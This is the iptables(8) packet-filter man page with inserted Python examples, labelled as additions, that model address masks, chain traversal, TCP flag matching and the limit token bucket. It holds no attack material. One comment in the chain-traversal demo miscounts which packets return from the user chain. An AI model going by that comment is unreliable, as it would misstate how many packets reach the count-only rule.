
IPTABLES(8)                                           IPTABLES(8)


NAME
       iptables - IP packet filter administration

SYNOPSIS
       iptables -[ADC] chain rule-specification [options]
       iptables -[RI] chain rulenum rule-specification [options]
       iptables -D chain rulenum [options]
       iptables -[LFZ] [chain] [options]
       iptables -[NX] chain
       iptables -P chain target [options]
       iptables -E old-chain-name new-chain-name

DESCRIPTION
       Iptables is used to set up, maintain, and inspect the tables of
       IP packet filter rules in the Linux kernel.  There are several
       different tables which may be defined, and each table contains
       a number of built-in chains, and may contain user-defined
       chains.

       Each  chain  is  a  list of rules which can match a set of
       packets: each rule specifies what  to  do  with  a  packet
       which  matches.  This is called a `target', which may be a
       jump to a user-defined chain in the same table.


TARGETS
       A firewall rule specifies criteria for a packet, and a target.
       If the packet does not match, the next rule in the chain is
       examined; if it does match, then the next rule is specified by
       the value of the target, which can be the name of a
       user-defined chain, or one of the special values ACCEPT, DROP,
       QUEUE, or RETURN.

       ACCEPT means to let the packet through.  DROP means to drop the
       packet on the floor.  QUEUE means to pass the packet to
       userspace (if supported by the kernel).  RETURN means stop
       traversing this chain, and resume at the next rule in the
       previous (calling) chain.  If the end of a built-in chain is
       reached, or a rule in a built-in chain with target RETURN is
       matched, the target specified by the chain policy determines
       the fate of the packet.

TABLES
       There are currently three independent tables (which tables are
       present at any time depends on the kernel configuration options
       and which modules are present).

       -t, --table
              This option specifies the packet matching table which
              the command should operate on.  If the kernel is
              configured with automatic module loading, an attempt
              will be made to load the appropriate module for that
              table if it is not already there.

              The tables are as follows:

              filter This is the default table, and contains the
                     built-in chains INPUT (for packets coming into
                     the box itself), FORWARD (for packets being
                     routed through the box), and OUTPUT (for
                     locally-generated packets).

              nat    This table is consulted when a packet which
                     creates a new connection is encountered.  It
                     consists of three built-ins: PREROUTING (for
                     altering packets as soon as they come in), OUTPUT
                     (for altering locally-generated packets before
                     routing), and POSTROUTING (for altering packets
                     as they are about to go out).

              mangle This table is used for specialized packet
                     alteration.  It has two built-in chains:
                     PREROUTING (for altering incoming packets before
                     routing) and OUTPUT (for altering
                     locally-generated packets before routing).

OPTIONS
       The options that are recognized by iptables can be divided into
       several different groups.

   COMMANDS
       These options specify the specific action to perform; only one
       of them can be specified on the command line, unless otherwise
       specified below.  For all the long versions of the command and
       option names, you only need to use enough letters to ensure
       that iptables can differentiate it from all other options.

       -A, --append
              Append one or more rules to the end of the selected
              chain.  When the source and/or destination names resolve
              to more than one address, a rule will be added for each
              possible address combination.

       -D, --delete
              Delete one or more rules from the selected chain.  There
              are two versions of this command: the rule can be
              specified as a number in the chain (starting at 1 for
              the first rule) or a rule to match.

       -R, --replace
              Replace a rule in the selected chain.  If the source
              and/or destination names resolve to multiple addresses,
              the command will fail.  Rules are numbered starting
              at 1.

       -I, --insert
              Insert one or more rules in the selected chain as the
              given rule number.  So, if the rule number is 1, the
              rule or rules are inserted at the head of the chain.
              This is also the default if no rule number is specified.

       -L, --list
              List all rules in the selected chain.  If no chain is
              selected, all chains are listed.  It is legal to specify
              the -Z (zero) option as well, in which case the chain(s)
              will be atomically listed and zeroed.  The exact output
              is affected by the other arguments given.

       -F, --flush
              Flush the selected chain.  This is equivalent to
              deleting all the rules one by one.

       -Z, --zero
              Zero the packet and byte counters in all chains.  It is
              legal to specify the -L, --list (list) option as well,
              to see the counters immediately before they are cleared;
              see above.

       -N, --new-chain
              Create a new user-defined chain of the given name.
              There must be no target of that name already.

       -X, --delete-chain
              Delete the specified user-defined chain.  There must be
              no references to the chain (if there are you must delete
              or replace the referring rules before the chain can be
              deleted).  If no argument is given, it will attempt to
              delete every non-builtin chain in the table.

       -P, --policy
              Set the policy for the chain to the given target.  See
              the section TARGETS for the legal targets.  Only
              non-user-defined chains can have policies, and neither
              built-in nor user-defined chains can be policy targets.

       -E, --rename-chain
              Rename the user specified chain to the user supplied
              name; this is cosmetic, and has no effect on the
              structure of the table.

       -h     Help.  Give a (currently very brief) description of the
              command syntax.

   PARAMETERS
       The following parameters make up a rule specification (as used
       in the add, delete, replace, append and check commands).

       -p, --protocol [!] protocol
              The protocol of the rule or of the packet to check.  The
              specified protocol can be one of tcp, udp, icmp, or all,
              or it can be a numeric value, representing one of these
              protocols or a different one.  A protocol name from
              /etc/protocols is also allowed.  A "!" argument before
              the protocol inverts the test.  The number zero is
              equivalent to all.  Protocol all will match with all
              protocols and is taken as default when this option is
              omitted.

       -s, --source [!] address[/mask]
              Source specification.  Address can be either a hostname,
              a network name, or a plain IP address.  The mask can be
              either a network mask or a plain number, specifying the
              number of 1's at the left side of the network mask.
              Thus, a mask of 24 is equivalent to 255.255.255.0.  A
              "!" argument before the address specification inverts
              the sense of the address.  The flag --src is a
              convenient alias for this option.

       -d, --destination [!] address[/mask]
              Destination specification.  See the description of the
              -s (source) flag for a detailed description of the
              syntax.  The flag --dst is an alias for this option.
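       The address[/mask] syntax shared by -s and -d, worked through in an
       added Python example (not part of the man page): both mask forms,
       the "!" inversion, and rejection of a non-contiguous dotted mask.
       Hostname and network-name resolution is left out, and accepting
       the "!" inside the same string is this example's own convention.

```python
"""Parse and apply the [!] address[/mask] form of -s/--source and -d/--destination.

Added example, not the man page's code.  Only plain IP addresses are
handled (no hostname lookup).  A mask is either a prefix length ("24",
the count of 1 bits from the left) or a dotted mask ("255.255.255.0").
"""
import ipaddress
from typing import NamedTuple


def _prefix_from_dotted(mask: str) -> int:
    """Convert a dotted mask to a prefix length, refusing non-contiguous masks."""
    bits = int(ipaddress.IPv4Address(mask))
    ones = bin(bits).count("1")
    contiguous = (0xFFFFFFFF << (32 - ones)) & 0xFFFFFFFF
    if bits != contiguous:
        raise ValueError(f"non-contiguous network mask: {mask}")
    return ones


class AddrSpec(NamedTuple):
    network: ipaddress.IPv4Network
    negate: bool

    def matches(self, addr: str) -> bool:
        """True if addr is inside the network, inverted when the spec had a '!'."""
        hit = ipaddress.IPv4Address(addr) in self.network
        return not hit if self.negate else hit


def parse_addr_spec(spec: str) -> AddrSpec:
    """Parse '[!] address[/mask]' (a leading '!' in the same string is assumed)."""
    negate = False
    if spec.startswith("!"):
        negate = True
        spec = spec[1:].lstrip()
    addr, _, mask = spec.partition("/")
    if mask == "":
        prefix = 32                           # no mask given: a single host
    elif mask.isdigit():
        prefix = int(mask)                    # plain number of leading 1 bits
        if prefix > 32:
            raise ValueError(f"prefix length out of range: {mask}")
    else:
        prefix = _prefix_from_dotted(mask)    # dotted network mask
    # strict=False lets host bits in the address be masked off, as iptables does
    network = ipaddress.IPv4Network(f"{addr}/{prefix}", strict=False)
    return AddrSpec(network, negate)


def demo() -> dict:
    """Constructed sample specifications and addresses (RFC 1918 / private ranges)."""
    lan = parse_addr_spec("192.168.1.0/24")
    dotted = parse_addr_spec("192.168.1.0/255.255.255.0")
    not_lan = parse_addr_spec("! 192.168.1.0/24")
    host = parse_addr_spec("10.0.0.7")
    return {
        "same_net": lan.network == dotted.network,    # 24 == 255.255.255.0
        "lan_hit": lan.matches("192.168.1.200"),
        "lan_miss": lan.matches("192.168.2.1"),
        "negated": not_lan.matches("192.168.2.1"),
        "host_only": host.matches("10.0.0.8"),
        "host_hit": host.matches("10.0.0.7"),
    }
```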

       -j, --jump target
              This specifies the target of the rule; ie. what to do if
              the packet matches it.  The target can be a user-defined
              chain (not the one this rule is in), one of the special
              builtin targets which decide the fate of the packet
              immediately, or an extension (see EXTENSIONS below).  If
              this option is omitted in a rule, then matching the rule
              will have no effect on the packet's fate, but the
              counters on the rule will be incremented.
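       The traversal rules from the TARGETS section together with the
       "-j omitted" behaviour just described, simulated in an added Python
       example that is not part of the man page.  The rule representation
       (a predicate over a packet dict plus a target) and the sample chains
       are this example's own assumptions.

```python
"""Simulate iptables chain traversal as documented under TARGETS and -j.

Added example, not the man page's code.  A rule is (match, target) where
match is a predicate over a packet dict and target is ACCEPT, DROP, QUEUE,
RETURN, the name of a user-defined chain, or None (rule given without -j).
"""
from typing import Callable, Dict, List, Optional, Tuple

Packet = Dict[str, object]
Rule = Tuple[Callable[[Packet], bool], Optional[str]]

TERMINAL = {"ACCEPT", "DROP", "QUEUE"}   # targets that decide the fate at once


class Table:
    def __init__(self, chains: Dict[str, List[Rule]], policies: Dict[str, str]):
        self.chains = chains            # chain name -> ordered rules
        self.policies = policies        # built-in chain -> policy target
        self.counters: Dict[Tuple[str, int], int] = {}   # (chain, rule index) -> hits

    def _walk(self, chain: str, pkt: Packet) -> Optional[str]:
        """Traverse one chain; return a terminal verdict, or None for RETURN/end of chain."""
        for idx, (match, target) in enumerate(self.chains[chain]):
            if not match(pkt):
                continue                                # no match: examine the next rule
            self.counters[(chain, idx)] = self.counters.get((chain, idx), 0) + 1
            if target is None:
                continue                                # -j omitted: counted, fate unchanged
            if target in TERMINAL:
                return target
            if target == "RETURN":
                return None                             # resume in the calling chain
            verdict = self._walk(target, pkt)           # jump to a user-defined chain
            if verdict is not None:
                return verdict                          # the user chain decided
            # user chain returned or fell off its end: continue with the next rule here
        return None

    def verdict(self, builtin: str, pkt: Packet) -> str:
        """Fate of a packet entering a built-in chain; RETURN or end of chain means the policy."""
        decided = self._walk(builtin, pkt)
        return decided if decided is not None else self.policies[builtin]


def demo() -> Dict[str, str]:
    """Constructed table: INPUT with policy DROP hands TCP to a user chain."""
    is_tcp = lambda p: p["proto"] == "tcp"
    from_lan = lambda p: str(p["src"]).startswith("192.168.")
    to_ssh = lambda p: p["dport"] == 22
    anything = lambda p: True
    table = Table(
        chains={
            "INPUT": [
                (is_tcp, "tcp_in"),        # jump to user-defined chain
                (anything, None),          # no -j: counts every packet that gets here
                (anything, "RETURN"),      # RETURN in a built-in chain -> chain policy
                (anything, "ACCEPT"),      # never reached because of the RETURN above
            ],
            "tcp_in": [
                (from_lan, "ACCEPT"),
                (to_ssh, "DROP"),
                # falling off the end of a user chain acts like RETURN
            ],
        },
        policies={"INPUT": "DROP"},
    )
    out = {
        "lan_ssh": table.verdict("INPUT", {"proto": "tcp", "src": "192.168.1.5", "dport": 22}),
        "wan_ssh": table.verdict("INPUT", {"proto": "tcp", "src": "203.0.113.9", "dport": 22}),
        "wan_http": table.verdict("INPUT", {"proto": "tcp", "src": "203.0.113.9", "dport": 80}),
        "udp": table.verdict("INPUT", {"proto": "udp", "src": "203.0.113.9", "dport": 53}),
    }
    # the target-less rule saw the two packets that came back from tcp_in plus the UDP one
    out["count_only_hits"] = str(table.counters.get(("INPUT", 1), 0))
    return out
```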

       -i, --in-interface [!] [name]
              Optional name of an interface via which a packet is
              received (for packets entering the INPUT, FORWARD and
              PREROUTING chains).  When the "!" argument is used
              before the interface name, the sense is inverted.  If
              the interface name ends in a "+", then any interface
              which begins with this name will match.  If this option
              is omitted, the string "+" is assumed, which will match
              with any interface name.

       -o, --out-interface [!] [name]
              Optional name of an interface via which a packet is
              going to be sent (for packets entering the FORWARD,
              OUTPUT and POSTROUTING chains).  When the "!" argument
              is used before the interface name, the sense is
              inverted.  If the interface name ends in a "+", then any
              interface which begins with this name will match.  If
              this option is omitted, the string "+" is assumed, which
              will match with any interface name.

       [!] -f, --fragment
              This means that the rule only refers to second and
              further fragments of fragmented packets.  Since there is
              no way to tell the source or destination ports of such a
              packet (or ICMP type), such a packet will not match any
              rules which specify them.  When the "!" argument
              precedes the "-f" flag, the rule will only match head
              fragments, or unfragmented packets.

   OTHER OPTIONS
       The following additional options can be specified:

       -v, --verbose
              Verbose output.  This option makes the list command show
              the interface address, the rule options (if any), and
              the TOS masks.  The packet and byte counters are also
              listed, with the suffix 'K', 'M' or 'G' for 1000,
              1,000,000 and 1,000,000,000 multipliers respectively
              (but see the -x flag to change this).  For appending,
              insertion, deletion and replacement, this causes
              detailed information on the rule or rules to be printed.

       -n, --numeric
              Numeric output.  IP addresses and port numbers will be
              printed in numeric format.  By default, the program will
              try to display them as host names, network names, or
              services (whenever applicable).

       -x, --exact
              Expand numbers.  Display the exact value of the packet
              and byte counters, instead of only the rounded number in
              K's (multiples of 1000) M's (multiples of 1000K) or G's
              (multiples of 1000M).  This option is only relevant for
              the -L command.

       --line-numbers
              When listing rules, add line numbers to the beginning of
              each rule, corresponding to that rule's position in the
              chain.

MATCH EXTENSIONS
       iptables can use extended packet matching modules.  These are
       loaded in two ways: implicitly, when -p or --protocol is
       specified, or with the -m or --match options, followed by the
       matching module name; after these, various extra command line
       options become available, depending on the specific module.
       You can specify multiple extended match modules in one line,
       and you can use the -h or --help options after the module has
       been specified to receive help specific to that module.

       The following are included in the base package, and most of
       these can be preceded by a ! to invert the sense of the match.

   tcp
       These extensions are loaded if `--protocol tcp' is specified.
       It provides the following options:

       --source-port [!] [port[:port]]
              Source port or port range specification.  This can
              either be a service name or a port number.  An inclusive
              range can also be specified, using the format port:port.
              If the first port is omitted, "0" is assumed; if the
              last is omitted, "65535" is assumed.  If the second port
              is greater than the first they will be swapped.  The
              flag --sport is an alias for this option.

       --destination-port [!] [port[:port]]
              Destination port or port range specification.  The flag
              --dport is an alias for this option.

       --tcp-flags [!] mask comp
              Match when the TCP flags are as specified.  The first
              argument is the flags which we should examine, written
              as a comma-separated list, and the second argument is a
              comma-separated list of flags which must be set.  Flags
              are: SYN ACK FIN RST URG PSH ALL NONE.  Hence the
              command
               iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST SYN
              will only match packets with the SYN flag set, and the
              ACK, FIN and RST flags unset.

       [!] --syn
              Only match TCP packets with the SYN bit set and the ACK
              and FIN bits cleared.  Such packets are used to request
              TCP connection initiation; for example, blocking such
              packets coming in an interface will prevent incoming TCP
              connections, but outgoing TCP connections will be
              unaffected.  It is equivalent to --tcp-flags SYN,RST,ACK
              SYN.  If the "!" flag precedes the "--syn", the sense of
              the option is inverted.
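       The mask/comp semantics of --tcp-flags and the documented --syn
       equivalence, checked in an added Python example (not part of the
       man page).  The packet is reduced to its 6-bit TCP flag field; the
       bit values chosen for the flags are this example's own.

```python
"""Evaluate --tcp-flags mask comp and [!] --syn over a TCP flag byte.

Added example, not the man page's code.  A rule matches when the flags
selected by `mask` are exactly those listed in `comp`; flags outside the
mask are ignored.  ALL and NONE are accepted in either list as documented.
"""
FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}
ALL_FLAGS = 0x3F


def parse_flag_list(spec: str) -> int:
    """Turn 'SYN,ACK', 'ALL' or 'NONE' into a bitmask (KeyError for an unknown name)."""
    bits = 0
    for name in spec.upper().split(","):
        if name == "ALL":
            bits |= ALL_FLAGS
        elif name != "NONE":
            bits |= FLAG_BITS[name]
    return bits


def tcp_flags_match(pkt_flags: int, mask: str, comp: str, invert: bool = False) -> bool:
    """--tcp-flags mask comp: (flags & mask) == comp, inverted by a leading '!'."""
    m, c = parse_flag_list(mask), parse_flag_list(comp)
    hit = (pkt_flags & m) == c
    return hit != invert


def syn_match(pkt_flags: int, invert: bool = False) -> bool:
    """[!] --syn, which the man page defines as --tcp-flags SYN,RST,ACK SYN."""
    return tcp_flags_match(pkt_flags, "SYN,RST,ACK", "SYN", invert)


def flags_of(*names: str) -> int:
    """Helper to build a flag byte from flag names."""
    return parse_flag_list(",".join(names)) if names else 0


def demo() -> dict:
    syn_only = flags_of("SYN")
    syn_ack = flags_of("SYN", "ACK")
    syn_psh = flags_of("SYN", "PSH")
    rst = flags_of("RST")
    return {
        # the man page's example rule: --tcp-flags SYN,ACK,FIN,RST SYN
        "example_syn": tcp_flags_match(syn_only, "SYN,ACK,FIN,RST", "SYN"),
        "example_synack": tcp_flags_match(syn_ack, "SYN,ACK,FIN,RST", "SYN"),
        # PSH lies outside the mask and so is not examined
        "example_synpsh": tcp_flags_match(syn_psh, "SYN,ACK,FIN,RST", "SYN"),
        # --syn agrees with its documented --tcp-flags form for every flag combination
        "syn_equivalence": all(
            syn_match(f) == tcp_flags_match(f, "SYN,RST,ACK", "SYN")
            for f in range(ALL_FLAGS + 1)
        ),
        "not_syn_on_rst": syn_match(rst, invert=True),
        "all_none_on_empty": tcp_flags_match(0, "ALL", "NONE"),
    }
```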

       --tcp-option [!] number
              Match if TCP option set.

   udp
       These extensions are loaded if `--protocol udp' is specified.
       It provides the following options:

       --source-port [!] [port[:port]]
              Source port or port range specification.  See the
              description of the --source-port option of the TCP
              extension for details.

       --destination-port [!] [port[:port]]
              Destination port or port range specification.  See the
              description of the --destination-port option of the TCP
              extension for details.

   icmp
       This extension is loaded if `--protocol icmp' is specified.  It
       provides the following option:

       --icmp-type [!] typename
              This allows specification of the ICMP type, which can be
              a numeric ICMP type, or one of the ICMP type names shown
              by the command
               iptables -p icmp -h

   mac
       --mac-source [!] address
              Match source MAC address.  It must be of the form
              XX:XX:XX:XX:XX:XX.  Note that this only makes sense for
              packets entering the PREROUTING, FORWARD or INPUT chains
              for packets coming from an ethernet device.

   limit
       This module matches at a limited rate using a token bucket
       filter: it can be used in combination with the LOG target to
       give limited logging.  A rule using this extension will match
       until this limit is reached (unless the `!' flag is used).

       --limit rate
              Maximum average matching rate: specified as a number,
              with an optional `/second', `/minute', `/hour', or
              `/day' suffix; the default is 3/hour.

       --limit-burst number
              The maximum initial number of packets to match: this
              number gets recharged by one every time the limit
              specified above is not reached, up to this number; the
              default is 5.
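       The token bucket behind --limit and --limit-burst, modelled in an
       added Python example (not part of the man page): the bucket starts
       at the burst size, each match spends one token, and tokens recharge
       at the configured rate up to the burst.  Timestamps are plain
       seconds supplied by the caller, which is this example's own choice.

```python
"""Token-bucket model of the iptables limit match.

Added example, not the man page's code.  Defaults follow the man page
(3/hour, burst 5).  Time is passed in explicitly as seconds so the
behaviour can be checked without waiting.
"""
_SECONDS_PER_UNIT = {"second": 1.0, "minute": 60.0, "hour": 3600.0, "day": 86400.0}


def parse_rate(spec: str) -> float:
    """'3/hour' -> seconds per token (1200.0); a bare number means per second."""
    count, _, unit = spec.partition("/")
    seconds = _SECONDS_PER_UNIT[unit or "second"]   # KeyError for an unknown suffix
    return seconds / float(count)


class LimitMatch:
    def __init__(self, rate: str = "3/hour", burst: int = 5, invert: bool = False):
        self.interval = parse_rate(rate)   # seconds needed to recharge one token
        self.burst = burst                 # bucket capacity and initial fill
        self.invert = invert               # the `!' flag
        self._tokens = float(burst)
        self._last = 0.0                   # time of the previous packet

    def matches(self, now: float) -> bool:
        """Does a packet seen at time `now` match the rule?"""
        elapsed = now - self._last
        self._last = now
        # recharge one token per elapsed rate interval, never above the burst
        self._tokens = min(float(self.burst), self._tokens + elapsed / self.interval)
        if self._tokens >= 1.0:
            self._tokens -= 1.0
            hit = True
        else:
            hit = False                    # limit reached: rule stops matching
        return hit != self.invert


def demo() -> dict:
    """Constructed packet timings against the default and a fast limit."""
    default = LimitMatch()                                  # 3/hour, burst 5
    burst_hits = [default.matches(0.0) for _ in range(6)]   # 5 match, the 6th does not
    after_20min = default.matches(1200.0)                   # one token recharged (3600/3 s)
    right_after = default.matches(1201.0)                   # bucket empty again
    fast = LimitMatch(rate="2/second", burst=2)             # one token every 0.5 s
    fast_hits = [fast.matches(t) for t in (0.0, 0.25, 0.5, 0.75)]
    inverted = LimitMatch(rate="2/second", burst=1, invert=True)
    inverted_hits = [inverted.matches(t) for t in (0.0, 0.1)]  # `!': matches once over limit
    return {
        "burst": burst_hits,
        "after_20min": after_20min,
        "right_after": right_after,
        "fast": fast_hits,
        "inverted": inverted_hits,
        "interval_3_per_hour": parse_rate("3/hour"),
    }
```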

   multiport
       This module matches a set of source or destination ports.  Up
       to 15 ports can be specified.  It can only be used in
       conjunction with -p tcp or -p udp.

       --source-port [port[,port]]
              Match if the source port is one of the given ports.

       --destination-port [port[,port]]
              Match if the destination port is one of the given ports.

       --port [port[,port]]
              Match if both the source and destination ports are equal
              to each other and to one of the given ports.

   mark
       This module matches the netfilter mark field associated with a
       packet (which can be set using the MARK target below).

       --mark value[/mask]
              Matches packets with the given unsigned mark value (if a
              mask is specified, this is logically ANDed with the mark
              before the comparison).

   owner
       This module attempts to match various characteristics of the
       packet creator, for locally-generated packets.  It is only
       valid in the OUTPUT chain, and even then some packets (such as
       ICMP ping responses) may have no owner, and hence never match.

       --uid-owner userid
              Matches if the packet was created by a process with the
              given effective user id.

       --gid-owner groupid
              Matches if the packet was created by a process with the
              given effective group id.

       --pid-owner processid
              Matches if the packet was created by a process with the
              given process id.

       --sid-owner sessionid
              Matches if the packet was created by a process in the
              given session group.

   state
       This module, when combined with connection tracking, allows
       access to the connection tracking state for this packet.

       --state state
              Where state is a comma separated list of the connection
              states to match.  Possible states are INVALID meaning
              that the packet is associated with no known connection,
              ESTABLISHED meaning that the packet is associated with a
              connection which has seen packets in both directions,
              NEW meaning that the packet has started a new
              connection, or otherwise associated with a connection
              which has not seen packets in both directions, and
              RELATED meaning that the packet is starting a new
              connection, but is associated with an existing
              connection, such as an FTP data transfer, or an ICMP
              error.

   unclean
       This module takes no options, but attempts to match packets
       which seem malformed or unusual.  This is regarded as
       experimental.

   tos
       This module matches the 8 bits of Type of Service field in the
       IP header (ie. including the precedence bits).

       --tos tos
              The argument is either a standard name, (use
               iptables -m tos -h
              to see the list), or a numeric value to match.

TARGET EXTENSIONS
       iptables can use extended target modules: the following are
       included in the standard distribution.

   LOG
       Turn on kernel logging of matching packets.  When this option
       is set for a rule, the Linux kernel will print some information
       on all matching packets (like most IP header fields) via the
       kernel log (where it can be read with dmesg or syslogd(8)).

       --log-level level
              Level of logging (numeric or see syslog.conf(5)).

       --log-prefix prefix
              Prefix log messages with the specified prefix; up to 29
              letters long, and useful for distinguishing messages in
              the logs.

       --log-tcp-sequence
              Log TCP sequence numbers.  This is a security risk if
              the log is readable by users.

       --log-tcp-options
              Log options from the TCP packet header.

       --log-ip-options
              Log options from the IP packet header.

   MARK
       This is used to set the netfilter mark value associated with
       the packet.  It is only valid in the mangle table.

       --set-mark mark

   REJECT
       This is used to send back an error packet in response to the
       matched packet: otherwise it is equivalent to DROP.  This
       target is only valid in the INPUT, FORWARD and OUTPUT chains,
       and user-defined chains which are only called from those
       chains.  Several options control the nature of the error packet
       returned:

       --reject-with type
              The type given can be icmp-net-unreachable,
              icmp-host-unreachable, icmp-port-unreachable,
              icmp-proto-unreachable, icmp-net-prohibited or
              icmp-host-prohibited, which return the appropriate ICMP
              error message (port-unreachable is the default).  The
              option echo-reply is also allowed; it can only be used
              for rules which specify an ICMP ping packet, and
              generates a ping reply.  Finally, the option tcp-reset
              can be used on rules which only match the TCP protocol:
              this causes a TCP RST packet to be sent back.  This is
              mainly useful for blocking ident probes which frequently
              occur when sending mail to broken mail hosts (which
              won't accept your mail otherwise).

   TOS
       This is used to set the 8-bit Type of Service field in the IP
       header.  It is only valid in the mangle table.

       --set-tos tos
              You can use a numeric TOS value, or use
               iptables -j TOS -h
              to see the list of valid TOS names.

   MIRROR
       This is an experimental demonstration target which inverts the
       source and destination fields in the IP header and retransmits
       the packet.  It is only valid in the INPUT, FORWARD and
       PREROUTING chains, and user-defined chains which are only
       called from those chains.  Note that the outgoing packets are
       NOT seen by any packet filtering chains, connection tracking or
       NAT, to avoid loops and other problems.

   SNAT
       This target is only valid in the nat table, in the POSTROUTING
       chain.  It specifies that the source address of the packet
       should be modified (and all future packets in this connection
       will also be mangled), and rules should cease being examined.
       It takes one option:

       --to-source <ipaddr>[-<ipaddr>][:port-port]
              which can specify a single new source IP address, an
              inclusive range of IP addresses, and optionally, a port
              range (which is only valid if the rule also specifies
              -p tcp or -p udp).  If no port range is specified, then
              source ports below 512 will be mapped to other ports
              below 512: those between 1024 will be mapped to ports
              below 1024, and other ports will be mapped to 1024 or
              above.  Where possible, no port alteration will occur.

   DNAT
       This target is only valid in the nat table, in the PREROUTING
       and OUTPUT chains, and user-defined chains which are only
       called from those chains.  It specifies that the destination
       address of the packet should be modified (and all future
       packets in this connection will also be mangled), and rules
       should cease being examined.  It takes one option:

       --to-destination <ipaddr>[-<ipaddr>][:port-port]
              which can specify a single new destination IP address,
              an inclusive range of IP addresses, and optionally, a
              port range (which is only valid if the rule also
              specifies -p tcp or -p udp).  If no port range is
              specified, then the destination port will never be
              modified.

   MASQUERADE
       This target is only valid in the nat table, in the POSTROUTING
       chain.  It should only be used with dynamically assigned IP
       (dialup) connections: if you have a static IP address, you
       should use the SNAT target.  Masquerading is equivalent to
       specifying a mapping to the IP address of the interface the
       packet is going out, but also has the effect that connections
       are forgotten when the interface goes down.  This is the
       correct behavior when the next dialup is unlikely to have the
       same interface address (and hence any established connections
       are lost anyway).  It takes one option:

       --to-ports <port>[-<port>]
              This specifies a range of source ports to use,
              overriding the default SNAT source port-selection
              heuristics (see above).  This is only valid if the rule
              also specifies -p tcp or -p udp.

   REDIRECT
       This target is only valid in the nat table, in the PREROUTING
       and OUTPUT chains, and user-defined chains which are only
       called from those chains.  It alters the destination IP address
       to send the packet to the machine itself (locally-generated
       packets are mapped to the 127.0.0.1 address).  It takes one
       option:

       --to-ports <port>[-<port>]
              This specifies a destination port or range of ports to
              use: without this, the destination port is never
              altered.  This is only valid if the rule also specifies
              -p tcp or -p udp.

EXTRA EXTENSIONS
       The following extensions are not included by default in the
       standard distribution.

   ttl
       This module matches the time to live field in the IP header.

       --ttl ttl
              Matches the given TTL value.

   TTL
       This target is used to modify the time to live field in the IP
       header.  It is only valid in the mangle table.

       --ttl-set ttl
              Set the TTL to the given value.

       --ttl-dec ttl
              Decrement the TTL by the given value.

       --ttl-inc ttl
              Increment the TTL by the given value.

   ULOG
       This target provides userspace logging of matching packets.
       When this target is set for a rule, the Linux kernel will
       multicast this packet through a netlink socket.  One or more
       userspace processes may then subscribe to various multicast
       groups and receive the packets.

       --ulog-nlgroup <nlgroup>
              This specifies the netlink group (1-32) to which the
              packet is sent.

       --ulog-prefix <prefix>
              Prefix log messages with the specified prefix; up to 32
              characters long, and useful for distinguishing messages
              in the logs.

       --ulog-cprange <size>
              Number of bytes to be copied to userspace.  A value of 0
              always copies the entire packet, regardless of its size.

DIAGNOSTICS
       Various error messages are printed to standard error.  The exit
       code is 0 for correct functioning.  Errors which appear to be
       caused by invalid or abused command line parameters cause an
       exit code of 2, and other errors cause an exit code of 1.

BUGS
       Check is not implemented (yet).

COMPATIBILITY WITH IPCHAINS
       This iptables is very similar to ipchains by Rusty Russell.
       The main difference is that the chains INPUT and OUTPUT are
       only traversed for packets coming into the local host and
       originating from the local host respectively.  Hence every
       packet only passes through one of the three chains; previously
       a forwarded packet would pass through all three.

       The other main difference is that -i refers to the input
       interface; -o refers to the output interface, and both are
       available for packets entering the FORWARD chain.

       iptables is a pure packet filter when using the default
       `filter' table, with optional extension modules.  This should
       simplify much of the previous confusion over the combination of
       IP masquerading and packet filtering seen previously.  So the
       following options are handled differently:
        -j MASQ
        -M -S
        -M -L
       There are several other changes in iptables.

SEE ALSO
       The iptables-HOWTO, which details more iptables usage, the
       NAT-HOWTO, which details NAT, and  the  netfilter-hacking-
       HOWTO which details the internals.

AUTHORS
       Rusty  Russell  wrote iptables, in early consultation with
       Michael Neuling.

       Marc Boucher made Rusty abandon ipnatctl by lobbying for a
       generic packet selection framework in iptables, then wrote
       the mangle table, the owner match, the mark stuff, and ran
       around doing cool stuff everywhere.

       James Morris wrote the TOS target, and tos match.

       Jozsef Kadlecsik wrote the REJECT target.

       Harald  Welte  wrote the ULOG target, TTL match+target and
       libipulog.

       The Netfilter Core Team is: Marc Boucher, James Morris and
       Rusty Russell.






                           Aug 11, 2000                         1